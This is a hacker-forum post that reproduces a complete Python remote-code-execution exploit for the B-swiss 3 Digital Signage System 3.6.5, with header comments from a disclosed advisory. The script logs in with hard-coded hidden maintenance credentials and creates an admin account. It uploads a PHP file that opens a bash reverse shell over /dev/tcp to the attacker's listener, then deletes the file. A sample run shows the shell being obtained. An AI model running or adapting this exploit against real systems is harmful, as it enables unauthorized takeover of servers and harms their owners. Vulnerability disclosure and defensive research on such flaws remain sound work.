Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution

 Share


Recommended Posts

# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
#                   3.6.2
#                   3.6.1
#                   3.6.0
#                   3.5.80
#                   3.5.40
#                   3.5.20
#                   3.5.00
#                   3.2.00
#                   3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$ 
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
#            Linux 4.15.0-20-generic x86_64
#            Linux 4.9.78-xxxx-std-ipv6-64
#            Linux 4.7.0-040700-generic x86_64
#            Linux 4.2.0-27-generic x86_64
#            Linux 3.19.0-47-generic x86_64
#            Linux 2.6.32-5-amd64 x86_64
#            Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
#            macOS 10.13.5
#            Microsoft Windows 7 Business Edition SP1 i586
#            Apache/2.4.29 (Ubuntu)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.4.7 (Ubuntu)
#            Apache/2.2.22 (Win64)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.2.16 (Debian)
#            PHP/7.2.24-0ubuntu0.18.04.6
#            PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
#            PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
#            PHP/5.6.31
#            PHP/5.6.30-10+deb.sury.org~xenial+2
#            PHP/5.5.9-1ubuntu4.17
#            PHP/5.5.9-1ubuntu4.14
#            PHP/5.3.10
#            PHP/5.3.13
#            PHP/5.3.3-7+squeeze16
#            PHP/5.3.3-7+squeeze17
#            MySQL/5.5.49
#            MySQL/5.5.47
#            MySQL/5.5.40
#            MySQL/5.5.30
#            MySQL/5.1.66
#            MySQL/5.1.49
#            MySQL/5.0.77
#            MySQL/5.0.12-dev
#            MySQL/5.0.11-dev
#            MySQL/5.0.8-dev
#            phpMyAdmin/3.5.7
#            phpMyAdmin/3.4.10.1deb1
#            phpMyAdmin/3.4.7
#            phpMyAdmin/3.3.7deb7
#            WampServer 3.2.0
#            Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#

from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar#         oOo         #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep#      |              01 | 04              |      #peels trompi emit morf
import urllib.request#       |                 |              |  |       #tseuqer.billru tropmi
import urllib.parse#         |                 |              |  |         #esrap.billru tropmi
import telnetlib#            |                 |                 |            #biltenlet tropmi
import threading#            |  |              |                 |            #gnidaerht tropmi
import requests#             |  |              |                 |             #stseuqer tropmi
import socket#               |                 |    o            |               #tekcos tropmi
import sys,re#               |                 |                 |               #er,sys tropmi
##############               #-----------------+-----------------#               ##############
###############                               oOo                               ###############
################                               |                               ################
####################                           Y                           ####################
############################                   _                   ############################
###############################################################################################

class Sign:
    
    def __init__(self):
        self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
        self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
        self.password = b"\x44\x50\x36\x25\x57\x33\x64"
        self.agent = "SignageBot/1.02"
        self.fileid = "251"
        self.payload = None
        self.answer = False
        self.params = None
        self.rhost = None
        self.lhost = None
        self.lport = None
        self.send = None

    def env(self):
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.rhost:
                self.rhost = "http://{}".format(self.rhost)

    def usage(self):
        self.roger()
        print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
        print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
        exit(0)

    def roger(self):
        waddup = """
       ____________________
      /                    \\
      !      B-swiss 3     !
      !         RCE        !
      \____________________/
               !  !
               !  !
               L_ !
              / _)!
             / /__L
____________/ (____)
              (____)
____________  (____)
            \_(____)
               !  !
               !  !
               \__/  
        """
        print(waddup)

    def test(self):
        print("[*] Checking target...")
        try:
            r = requests.get(self.rhost)
            response = r.text
            if not "B-swiss" in response:
                print("[!] Not a b-swiss system")
                exit(0)
            if "B-swiss" in response:
                print("[*] Good to go!")
                next
            else:
                exit(-251)
        except Exception as e:
            print("[!] Ney ney: {msg}".format(msg=e))
            exit(-1)

    def login(self):
        token = ""
        cj = CookieJar()
        self.params = {"locator"  : "visitor.ProcessLogin",
                       "username" : self.username,
                       "password" : self.password,
                       "x"        : "0",
                       "y"        : "0"}

        damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        damato.addheaders.pop()
        damato.addheaders.append(("User-Agent", self.agent))
        
        try:
            print("[*] Getting backdoor session...")
            damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
            for cookie in cj:
                token = cookie.value
                print("[*] Got master backdoor cookie: "+token)
        except urllib.request.URLError as e:
            print("[!] Connection error: {}".format(e.reason))

        return token

    def upload(self):
        j = "\r\n"
        self.cookies = {"PNU_RAD_LIB"     : self.rtoken}
        self.headers = {"Cache-Control"   : "max-age=0",
                        "Content-Type"    : "multipart/form-data; boundary=----j",
                        "User-Agent"      : self.agent,
                        "Accept-Encoding" : "gzip, deflate",
                        "Accept-Language" : "en-US,en;q=0.9",
                        "Connection"      : "close"}
    
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"

        print("[*] Adding GUI credentials: test:123456")
        # rec_adminlevel values:
        # ----------------------
        # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
        #      7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
        #      8 - Other                                                                                                   |
        #                                                                                                                  |
        self.send  = "------j{}Content-Disposition: form-data; ".format(j)#                                                |
        self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#            |
        self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)#           |
        self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                      |
        self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                          |
        self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                       |
        self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                            |
        self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                 |
        self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)#            |
        self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#        |
        self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#             |
        self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#          |
        self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#   <----------+
        self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
        self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
        self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
    
        requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
        print("[*] Executing and deleting stager file")
        r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
        sleep(1)

        self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
        if self.answer[0] == "y" or self.answer[0] == "Y":
            print("[*] Removing...")
            requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
        if self.answer[0] == "n" or self.answer[0] == "N":
            print("[*] Cool!")
        print("[*] t00t!")
        exit(-1)

    def razmisluju(self):
        print("[*] Starting callback listener child thread")
        konac = threading.Thread(name="ZSL", target=self.phone)
        konac.start()
        sleep(1)
        self.upload()

    def fish(self):
        r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
        response = r.text
        print("[*] Checking for previous attempts...")
        if not ".php" in response:
            print("[*] All good.")
        elif "251.php" in response:
            print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))

    def phone(self):
        telnetus = telnetlib.Telnet()
        print("[*] Starting handler on port {}".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(7)
                s.listen(1)
                conn, addr = s.accept()
                print("[*] Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("[!] No outgoing calls :( ({msg})".format(msg=p))
                print("[+] Check your port mappings or increase timeout")
                s.close()
                exit(0)
            break

        print("[*] You got shell!")
        telnetus.interact()
        conn.close()

    def main(self):
        self.env()
        self.test()
        self.fish()
        self.rtoken = self.login()
        self.razmisluju()

if __name__ == '__main__':
    Sign().main()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...